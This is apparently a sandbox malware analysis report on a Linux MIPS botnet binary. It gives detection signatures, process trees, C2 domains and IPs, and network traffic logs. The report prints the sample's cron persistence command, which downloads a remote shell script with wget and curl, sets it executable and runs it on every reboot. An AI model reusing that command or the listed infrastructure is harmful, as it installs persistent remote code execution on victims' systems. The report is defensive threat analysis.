Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
gmpsl.elf

Overview

General Information

Sample name:gmpsl.elf
Analysis ID:1542855
MD5:353a49ca2c9b8b35fb036b2de1587fc4
SHA1:e5cd1ab8dc2c224a5b82113a41ec46479895ae27
SHA256:cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542855
Start date and time:2024-10-26 19:12:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 16s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:gmpsl.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@6/0
  • VT rate limit hit for: gmpsl.elf
Command:/tmp/gmpsl.elf
PID:5556
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • gmpsl.elf (PID: 5556, Parent: 5482, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/gmpsl.elf
    • sh (PID: 5558, Parent: 5556, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5560, Parent: 5558)
        • sh New Fork (PID: 5562, Parent: 5560)
        • crontab (PID: 5562, Parent: 5560, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5561, Parent: 5558)
      • crontab (PID: 5561, Parent: 5558, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: gmpsl.elfReversingLabs: Detection: 18%
Source: tmp.iGlZeG.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 195.133.92.51 ports 13529,1,2,3,5,9
Source: global trafficTCP traffic: 88.151.195.22 ports 16375,1,3,5,6,7
Source: global trafficTCP traffic: 192.168.2.15:41720 -> 195.133.92.51:13529
Source: global trafficTCP traffic: 192.168.2.15:32896 -> 31.13.248.89:11885
Source: global trafficTCP traffic: 192.168.2.15:49956 -> 88.151.195.22:16375
Source: /tmp/gmpsl.elf (PID: 5556)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.iGlZeG.19.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@6/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5562)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5561)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 5561)File: /var/spool/cron/crontabs/tmp.iGlZeGJump to behavior
Source: /usr/bin/crontab (PID: 5561)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5580/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5591/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5581/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5592/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5582/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5593/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5583/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5584/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5585/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5586/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5587/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5392/cmdlineJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5590/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5588/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5578/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5589/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5563)File opened: /proc/5579/statusJump to behavior
Source: /tmp/gmpsl.elf (PID: 5558)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/gmpsl.elf (PID: 5556)Queries kernel information via 'uname': Jump to behavior
Source: gmpsl.elf, 5556.1.000055ada9cc4000.000055ada9d8e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: gmpsl.elf, 5556.1.00007fff63f80000.00007fff63fa1000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/gmpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/gmpsl.elf
Source: gmpsl.elf, 5556.1.000055ada9cc4000.000055ada9d8e000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: gmpsl.elf, 5556.1.00007fff63f80000.00007fff63fa1000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542855 Sample: gmpsl.elf Startdate: 26/10/2024 Architecture: LINUX Score: 60 28 88.151.195.22, 16375, 49956 AZERONLINEAZ Azerbaijan 2->28 30 195.133.92.51, 13529, 41720 AS-REGRU Russian Federation 2->30 32 3 other IPs or domains 2->32 38 Multi AV Scanner detection for submitted file 2->38 40 Connects to many ports of the same IP (likely port scanning) 2->40 9 gmpsl.elf 2->9         started        signatures3 process4 process5 11 gmpsl.elf sh 9->11         started        13 gmpsl.elf 9->13         started        15 gmpsl.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        file7 26 /var/spool/cron/crontabs/tmp.iGlZeG, ASCII 17->26 dropped 34 Sample tries to persist itself using cron 17->34 36 Executes the "crontab" command typically for achieving persistence 17->36 23 sh crontab 21->23         started        signatures8 process9 signatures10 42 Executes the "crontab" command typically for achieving persistence 23->42
SourceDetectionScannerLabelLink
gmpsl.elf18%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    unknown
    kingstonwikkerink.dyn
    193.233.193.45
    truefalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://hailcocks.ru/wget.sh;tmp.iGlZeG.19.drfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        88.151.195.22
        unknownAzerbaijan
        15723AZERONLINEAZtrue
        195.133.92.51
        unknownRussian Federation
        197695AS-REGRUtrue
        31.13.248.89
        unknownBulgaria
        34224NETERRA-ASBGfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        88.151.195.22nshsh4.elfGet hashmaliciousUnknownBrowse
          mips.elfGet hashmaliciousUnknownBrowse
            hmips.elfGet hashmaliciousUnknownBrowse
              arm7.elfGet hashmaliciousUnknownBrowse
                mpsl.elfGet hashmaliciousUnknownBrowse
                  mips.elfGet hashmaliciousUnknownBrowse
                    arm5.elfGet hashmaliciousUnknownBrowse
                      195.133.92.51nshsh4.elfGet hashmaliciousUnknownBrowse
                        harm4.elfGet hashmaliciousUnknownBrowse
                          mips.elfGet hashmaliciousUnknownBrowse
                            mips.elfGet hashmaliciousUnknownBrowse
                              31.13.248.89nsharm5.elfGet hashmaliciousUnknownBrowse
                                harm5.elfGet hashmaliciousUnknownBrowse
                                  nshsh4.elfGet hashmaliciousUnknownBrowse
                                    harm4.elfGet hashmaliciousUnknownBrowse
                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                        mips.elfGet hashmaliciousUnknownBrowse
                                          arm4.elfGet hashmaliciousUnknownBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            daisy.ubuntu.comnsharm5.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.25
                                            sshd.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            nsharm6.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            harm4.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            .i.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.25
                                            arm.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            c0r0n4x.arm6.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            c0r0n4x.x86.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.24
                                            c0r0n4x.ppc.elfGet hashmaliciousUnknownBrowse
                                            • 162.213.35.25
                                            kingstonwikkerink.dynnsharm5.elfGet hashmaliciousUnknownBrowse
                                            • 185.82.200.181
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                            • 213.182.204.57
                                            nshsh4.elfGet hashmaliciousUnknownBrowse
                                            • 194.87.198.29
                                            harm4.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 81.29.149.178
                                            arm.elfGet hashmaliciousUnknownBrowse
                                            • 213.182.204.57
                                            hmips.elfGet hashmaliciousUnknownBrowse
                                            • 194.87.198.29
                                            arm7.elfGet hashmaliciousUnknownBrowse
                                            • 185.82.200.181
                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 81.29.149.178
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NETERRA-ASBGnsharm5.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            nshsh4.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            harm4.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            jade.x86.elfGet hashmaliciousMiraiBrowse
                                            • 212.73.131.247
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            arm4.elfGet hashmaliciousUnknownBrowse
                                            • 31.13.248.89
                                            https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                            • 93.123.102.190
                                            https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                            • 93.123.102.185
                                            AZERONLINEAZnshsh4.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            hmips.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            arm7.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            arm5.elfGet hashmaliciousUnknownBrowse
                                            • 88.151.195.22
                                            na.elfGet hashmaliciousUnknownBrowse
                                            • 46.23.108.110
                                            https://94837-coinbase.com/Get hashmaliciousUnknownBrowse
                                            • 164.215.103.68
                                            http://bk.ruGet hashmaliciousHTMLPhisherBrowse
                                            • 62.217.160.2
                                            AS-REGRUnshsh4.elfGet hashmaliciousUnknownBrowse
                                            • 195.133.92.51
                                            harm4.elfGet hashmaliciousUnknownBrowse
                                            • 195.133.92.51
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 195.133.92.51
                                            PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                            • 194.58.112.174
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 212.24.61.227
                                            New orde.exeGet hashmaliciousFormBookBrowse
                                            • 194.58.112.174
                                            FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                            • 194.58.112.174
                                            P1 BOL.exeGet hashmaliciousUnknownBrowse
                                            • 37.140.192.179
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 195.133.92.51
                                            z10982283782.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • 194.58.112.174
                                            No context
                                            No context
                                            Process:/usr/bin/crontab
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):306
                                            Entropy (8bit):5.148371805764079
                                            Encrypted:false
                                            SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQNvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8NJeHLUHYC+GABjnOGAFkz
                                            MD5:6985CB8B5757AC0662A0A7F4496CD4A8
                                            SHA1:E9EDB05D3E97608862C31091E876D41C08E7525A
                                            SHA-256:F2FAED9B6DB5232C96E97FB2872F7CF592C0F35FAE88C6BEC286436C518CCA5C
                                            SHA-512:5242DEC426F82CACED01F77B1AE5150D4332149A08816374D5286EB7945C8D7986B67EDEECC0DBDC7EEA140FEFA8ED26752D80FFBD06917887B653D916437754
                                            Malicious:true
                                            Reputation:low
                                            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:13:13 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                            File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                            Entropy (8bit):5.559193399156919
                                            TrID:
                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                            File name:gmpsl.elf
                                            File size:89'400 bytes
                                            MD5:353a49ca2c9b8b35fb036b2de1587fc4
                                            SHA1:e5cd1ab8dc2c224a5b82113a41ec46479895ae27
                                            SHA256:cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
                                            SHA512:8a47f0d0a8899d153cf80d5579d7ca8f81b9efe9daf93a2f60f72d5ad1ed77a360f3ff6f93cad6b016a52ec6a6f76b94bf2d427f6d9eda0bc5f7cf609e6fd484
                                            SSDEEP:1536:GJTjy914iDyIV6n30taWKqlpbfc/SLuZ++5+BJoK+mcS/:GJTj614NNczc/0ublmx
                                            TLSH:4093E605BF510EFBDCABCD3746A9070135DC941722A82B3A7974D928F54B64F1AE3CA8
                                            File Content Preview:.ELF....................`.@.4....Z......4. ...(...............@...@.$P..$P..............$P..$PE.$PE.L....,..........Q.td...............................<l..'!......'.......................<H..'!... .........9'.. ........................<...'!............79

                                            ELF header

                                            Class:ELF32
                                            Data:2's complement, little endian
                                            Version:1 (current)
                                            Machine:MIPS R3000
                                            Version Number:0x1
                                            Type:EXEC (Executable file)
                                            OS/ABI:UNIX - System V
                                            ABI Version:0
                                            Entry Point Address:0x400260
                                            Flags:0x1007
                                            ELF Header Size:52
                                            Program Header Offset:52
                                            Program Header Size:32
                                            Number of Program Headers:3
                                            Section Header Offset:88800
                                            Section Header Size:40
                                            Number of Section Headers:15
                                            Header String Table Index:14
                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                            NULL0x00x00x00x00x0000
                                            .initPROGBITS0x4000940x940x8c0x00x6AX004
                                            .textPROGBITS0x4001200x1200x137200x00x6AX0016
                                            .finiPROGBITS0x4138400x138400x5c0x00x6AX004
                                            .rodataPROGBITS0x4138a00x138a00x17800x00x2A0016
                                            .eh_framePROGBITS0x4150200x150200x40x00x2A004
                                            .ctorsPROGBITS0x4550240x150240x80x00x3WA004
                                            .dtorsPROGBITS0x45502c0x1502c0x80x00x3WA004
                                            .data.rel.roPROGBITS0x4550380x150380x100x00x3WA004
                                            .dataPROGBITS0x4550500x150500x3c00x00x3WA0016
                                            .gotPROGBITS0x4554100x154100x6600x40x10000003WAp0016
                                            .sbssNOBITS0x455a700x15a700x2c0x00x10000003WAp004
                                            .bssNOBITS0x455aa00x15a700x22280x00x3WA0016
                                            .mdebug.abi32PROGBITS0xcde0x15a700x00x00x0001
                                            .shstrtabSTRTAB0x00x15a700x6e0x00x0001
                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                            LOAD0x00x4000000x4000000x150240x150245.59850x5R E0x10000.init .text .fini .rodata .eh_frame
                                            LOAD0x150240x4550240x4550240xa4c0x2ca43.59660x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 26, 2024 19:13:15.194645882 CEST4172013529192.168.2.15195.133.92.51
                                            Oct 26, 2024 19:13:15.200486898 CEST1352941720195.133.92.51192.168.2.15
                                            Oct 26, 2024 19:13:15.200539112 CEST4172013529192.168.2.15195.133.92.51
                                            Oct 26, 2024 19:13:15.210124016 CEST4172013529192.168.2.15195.133.92.51
                                            Oct 26, 2024 19:13:15.215703011 CEST1352941720195.133.92.51192.168.2.15
                                            Oct 26, 2024 19:13:15.215753078 CEST4172013529192.168.2.15195.133.92.51
                                            Oct 26, 2024 19:13:15.221344948 CEST1352941720195.133.92.51192.168.2.15
                                            Oct 26, 2024 19:13:16.111306906 CEST1352941720195.133.92.51192.168.2.15
                                            Oct 26, 2024 19:13:16.111527920 CEST4172013529192.168.2.15195.133.92.51
                                            Oct 26, 2024 19:13:16.111659050 CEST4172013529192.168.2.15195.133.92.51
                                            Oct 26, 2024 19:13:26.329171896 CEST3289611885192.168.2.1531.13.248.89
                                            Oct 26, 2024 19:13:26.334662914 CEST118853289631.13.248.89192.168.2.15
                                            Oct 26, 2024 19:13:26.334750891 CEST3289611885192.168.2.1531.13.248.89
                                            Oct 26, 2024 19:13:26.334752083 CEST3289611885192.168.2.1531.13.248.89
                                            Oct 26, 2024 19:13:26.340162992 CEST118853289631.13.248.89192.168.2.15
                                            Oct 26, 2024 19:13:26.340233088 CEST3289611885192.168.2.1531.13.248.89
                                            Oct 26, 2024 19:13:26.345623016 CEST118853289631.13.248.89192.168.2.15
                                            Oct 26, 2024 19:13:26.959698915 CEST118853289631.13.248.89192.168.2.15
                                            Oct 26, 2024 19:13:26.959981918 CEST3289611885192.168.2.1531.13.248.89
                                            Oct 26, 2024 19:13:26.965363979 CEST118853289631.13.248.89192.168.2.15
                                            Oct 26, 2024 19:13:32.171212912 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:13:32.176703930 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:13:32.176819086 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:13:32.176831007 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:13:32.182246923 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:13:32.182308912 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:13:32.187707901 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:13:42.185023069 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:13:42.190494061 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:13:42.490369081 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:13:42.490469933 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:15:02.557224989 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:15:02.563079119 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:15:02.863523960 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:15:02.863862038 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:16:22.933777094 CEST4995616375192.168.2.1588.151.195.22
                                            Oct 26, 2024 19:16:22.939239979 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:16:23.237380981 CEST163754995688.151.195.22192.168.2.15
                                            Oct 26, 2024 19:16:23.237613916 CEST4995616375192.168.2.1588.151.195.22
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 26, 2024 19:13:15.157980919 CEST4595753192.168.2.1580.152.203.134
                                            Oct 26, 2024 19:13:15.185539007 CEST534595780.152.203.134192.168.2.15
                                            Oct 26, 2024 19:13:21.115094900 CEST5664953192.168.2.155.161.109.23
                                            Oct 26, 2024 19:13:26.122047901 CEST4840053192.168.2.15152.53.15.127
                                            Oct 26, 2024 19:13:26.328576088 CEST5348400152.53.15.127192.168.2.15
                                            Oct 26, 2024 19:13:31.962094069 CEST5349153192.168.2.15168.235.111.72
                                            Oct 26, 2024 19:13:32.170619965 CEST5353491168.235.111.72192.168.2.15
                                            Oct 26, 2024 19:15:59.906851053 CEST5443053192.168.2.151.1.1.1
                                            Oct 26, 2024 19:15:59.906915903 CEST3287153192.168.2.151.1.1.1
                                            Oct 26, 2024 19:15:59.914367914 CEST53544301.1.1.1192.168.2.15
                                            Oct 26, 2024 19:15:59.914411068 CEST53328711.1.1.1192.168.2.15
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 26, 2024 19:13:15.157980919 CEST192.168.2.1580.152.203.1340x36a9Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:21.115094900 CEST192.168.2.155.161.109.230x9299Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.122047901 CEST192.168.2.15152.53.15.1270xbcefStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:31.962094069 CEST192.168.2.15168.235.111.720x7c11Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:15:59.906851053 CEST192.168.2.151.1.1.10x87caStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:15:59.906915903 CEST192.168.2.151.1.1.10x705aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:15.185539007 CEST80.152.203.134192.168.2.150x36a9No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:26.328576088 CEST152.53.15.127192.168.2.150xbcefNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                            Oct 26, 2024 19:13:32.170619965 CEST168.235.111.72192.168.2.150x7c11No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
